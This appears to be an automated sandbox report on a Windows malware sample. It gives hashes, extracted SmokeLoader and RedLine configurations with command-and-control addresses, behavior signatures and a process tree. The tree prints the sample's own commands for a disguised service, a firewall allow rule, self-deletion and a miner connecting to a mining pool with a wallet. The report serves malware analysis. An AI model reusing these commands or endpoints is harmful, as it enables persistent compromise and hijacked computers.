Analysis

  • max time kernel
    153s
  • max time network
    180s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    30-09-2021 02:56

General

  • Target

    539cd7419efcd8142d20462511e931d3.exe

  • Size

    240KB

  • MD5

    539cd7419efcd8142d20462511e931d3

  • SHA1

    2faf7df4c337ab8a4136560fd4b6fa0df8085bf7

  • SHA256

    4ba939154ee9df1004629da3aee541a36eb4faabe421190ddbbbf1ccd195e03a

  • SHA512

    a3ee44f0d4af926d6327af02229941e348fadc5d18d7d2b3278c3e6d3ee585af5c8f5be13fa89cd247dadf241ba08fce7c8c6e11d8959461d49305d38009ca45

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://fiskahlilian16.top/

http://paishancho17.top/

http://ydiannetter18.top/

http://azarehanelle19.top/

http://quericeriant20.top/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

r

C2

188.72.208.174:38430

Extracted

Family

redline

Botnet

Second BUILD

C2

asyndenera.xyz:15667

Signatures

  • Gozi RM3

    A heavily modified version of Gozi using RM3 loader.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 13 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 24 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\539cd7419efcd8142d20462511e931d3.exe
    "C:\Users\Admin\AppData\Local\Temp\539cd7419efcd8142d20462511e931d3.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Users\Admin\AppData\Local\Temp\539cd7419efcd8142d20462511e931d3.exe
      "C:\Users\Admin\AppData\Local\Temp\539cd7419efcd8142d20462511e931d3.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1812
  • C:\Users\Admin\AppData\Local\Temp\4836.exe
    C:\Users\Admin\AppData\Local\Temp\4836.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:532
    • C:\Users\Admin\AppData\Local\Temp\4836.exe
      C:\Users\Admin\AppData\Local\Temp\4836.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1872
  • C:\Users\Admin\AppData\Local\Temp\4BFE.exe
    C:\Users\Admin\AppData\Local\Temp\4BFE.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1304
    • C:\Users\Admin\AppData\Local\Temp\4BFE.exe
      C:\Users\Admin\AppData\Local\Temp\4BFE.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1848
  • C:\Users\Admin\AppData\Local\Temp\5783.exe
    C:\Users\Admin\AppData\Local\Temp\5783.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    PID:1920
    • C:\Users\Admin\AppData\Roaming\5783.exe
      "C:\Users\Admin\AppData\Roaming\5783.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of AdjustPrivilegeToken
      PID:1728
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Self.bat" "
        3⤵
          PID:1732
          • C:\Windows\SysWOW64\chcp.com
            chcp 1251
            4⤵
              PID:1616
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Roaming\5783.exe
            3⤵
              PID:1460
              • C:\Windows\SysWOW64\choice.exe
                choice /C Y /N /D Y /T 0
                4⤵
                  PID:2156
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Self.bat" "
              2⤵
                PID:932
                • C:\Windows\SysWOW64\chcp.com
                  chcp 1251
                  3⤵
                    PID:1096
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del 5783.exe
                  2⤵
                    PID:1368
                    • C:\Windows\SysWOW64\choice.exe
                      choice /C Y /N /D Y /T 0
                      3⤵
                        PID:1304
                  • C:\Users\Admin\AppData\Local\Temp\5FFD.exe
                    C:\Users\Admin\AppData\Local\Temp\5FFD.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1616
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hrzghcmz\
                      2⤵
                        PID:1080
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wzsayais.exe" C:\Windows\SysWOW64\hrzghcmz\
                        2⤵
                          PID:1096
                        • C:\Windows\SysWOW64\sc.exe
                          "C:\Windows\System32\sc.exe" create hrzghcmz binPath= "C:\Windows\SysWOW64\hrzghcmz\wzsayais.exe /d\"C:\Users\Admin\AppData\Local\Temp\5FFD.exe\"" type= own start= auto DisplayName= "wifi support"
                          2⤵
                            PID:1728
                          • C:\Windows\SysWOW64\sc.exe
                            "C:\Windows\System32\sc.exe" description hrzghcmz "wifi internet conection"
                            2⤵
                              PID:1476
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\System32\sc.exe" start hrzghcmz
                              2⤵
                                PID:808
                              • C:\Windows\SysWOW64\netsh.exe
                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                2⤵
                                  PID:1740
                              • C:\Users\Admin\AppData\Local\Temp\67EA.exe
                                C:\Users\Admin\AppData\Local\Temp\67EA.exe
                                1⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1864
                              • C:\Windows\SysWOW64\hrzghcmz\wzsayais.exe
                                C:\Windows\SysWOW64\hrzghcmz\wzsayais.exe /d"C:\Users\Admin\AppData\Local\Temp\5FFD.exe"
                                1⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:1640
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  2⤵
                                  • Drops file in System32 directory
                                  • Suspicious use of SetThreadContext
                                  • Modifies data under HKEY_USERS
                                  PID:1056
                                  • C:\Windows\SysWOW64\svchost.exe
                                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                    3⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2056
                              • C:\Users\Admin\AppData\Local\Temp\75D0.exe
                                C:\Users\Admin\AppData\Local\Temp\75D0.exe
                                1⤵
                                • Executes dropped EXE
                                PID:820
                                • C:\Users\Admin\AppData\Local\Temp\InternodesPiets_2021-09-29_21-00.exe
                                  "C:\Users\Admin\AppData\Local\Temp\InternodesPiets_2021-09-29_21-00.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2228
                                • C:\Users\Admin\AppData\Local\Temp\Money10k_.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Money10k_.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Modifies system certificate store
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2240
                              • C:\Users\Admin\AppData\Local\Temp\8857.exe
                                C:\Users\Admin\AppData\Local\Temp\8857.exe
                                1⤵
                                • Executes dropped EXE
                                PID:1072

                              Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • memory/820-120-0x0000000000F30000-0x0000000000F31000-memory.dmp

                                Filesize

                                4KB

                              • memory/1056-124-0x0000000000080000-0x0000000000095000-memory.dmp

                                Filesize

                                84KB

                              • memory/1212-212-0x000007FEF5000000-0x000007FEF5143000-memory.dmp

                                Filesize

                                1.3MB

                              • memory/1212-96-0x0000000002A00000-0x0000000002A15000-memory.dmp

                                Filesize

                                84KB

                              • memory/1212-64-0x0000000002AE0000-0x0000000002AF5000-memory.dmp

                                Filesize

                                84KB

                              • memory/1212-65-0x0000000002B30000-0x0000000002B40000-memory.dmp

                                Filesize

                                64KB

                              • memory/1212-213-0x000007FEFAAC0000-0x000007FEFAACA000-memory.dmp

                                Filesize

                                40KB

                              • memory/1304-79-0x0000000004990000-0x0000000004991000-memory.dmp

                                Filesize

                                4KB

                              • memory/1304-77-0x0000000001090000-0x0000000001091000-memory.dmp

                                Filesize

                                4KB

                              • memory/1616-100-0x0000000000020000-0x0000000000033000-memory.dmp

                                Filesize

                                76KB

                              • memory/1616-101-0x0000000000400000-0x000000000086C000-memory.dmp

                                Filesize

                                4.4MB

                              • memory/1640-123-0x0000000000400000-0x000000000086C000-memory.dmp

                                Filesize

                                4.4MB

                              • memory/1728-139-0x0000000004970000-0x0000000004971000-memory.dmp

                                Filesize

                                4KB

                              • memory/1728-132-0x0000000000920000-0x0000000000921000-memory.dmp

                                Filesize

                                4KB

                              • memory/1728-144-0x0000000000800000-0x000000000082A000-memory.dmp

                                Filesize

                                168KB

                              • memory/1812-62-0x0000000075801000-0x0000000075803000-memory.dmp

                                Filesize

                                8KB

                              • memory/1812-60-0x0000000000400000-0x0000000000409000-memory.dmp

                                Filesize

                                36KB

                              • memory/1832-63-0x0000000000020000-0x0000000000029000-memory.dmp

                                Filesize

                                36KB

                              • memory/1848-89-0x0000000000400000-0x0000000000422000-memory.dmp

                                Filesize

                                136KB

                              • memory/1848-97-0x0000000000480000-0x0000000000481000-memory.dmp

                                Filesize

                                4KB

                              • memory/1848-92-0x0000000000400000-0x0000000000422000-memory.dmp

                                Filesize

                                136KB

                              • memory/1864-112-0x0000000005230000-0x0000000005231000-memory.dmp

                                Filesize

                                4KB

                              • memory/1864-109-0x0000000000D90000-0x0000000000D91000-memory.dmp

                                Filesize

                                4KB

                              • memory/1920-86-0x0000000000470000-0x00000000004C1000-memory.dmp

                                Filesize

                                324KB

                              • memory/1920-84-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

                                Filesize

                                4KB

                              • memory/1920-88-0x0000000004A50000-0x0000000004A51000-memory.dmp

                                Filesize

                                4KB

                              • memory/1920-87-0x00000000002C0000-0x00000000002C1000-memory.dmp

                                Filesize

                                4KB

                              • memory/2056-190-0x0000000000080000-0x0000000000171000-memory.dmp

                                Filesize

                                964KB

                              • memory/2228-207-0x0000000000400000-0x000000000045D000-memory.dmp

                                Filesize

                                372KB

                              • memory/2228-204-0x00000000003D0000-0x00000000003EF000-memory.dmp

                                Filesize

                                124KB

                              • memory/2228-205-0x00000000004B0000-0x00000000004CE000-memory.dmp

                                Filesize

                                120KB

                              • memory/2228-206-0x00000000002B0000-0x00000000002E0000-memory.dmp

                                Filesize

                                192KB

                              • memory/2228-208-0x0000000004721000-0x0000000004722000-memory.dmp

                                Filesize

                                4KB

                              • memory/2228-209-0x0000000004722000-0x0000000004723000-memory.dmp

                                Filesize

                                4KB

                              • memory/2228-210-0x0000000004723000-0x0000000004724000-memory.dmp

                                Filesize

                                4KB

                              • memory/2228-211-0x0000000004724000-0x0000000004726000-memory.dmp

                                Filesize

                                8KB

                              • memory/2240-203-0x0000000005520000-0x0000000005521000-memory.dmp

                                Filesize

                                4KB

                              • memory/2240-201-0x0000000000DB0000-0x0000000000DB1000-memory.dmp

                                Filesize

                                4KB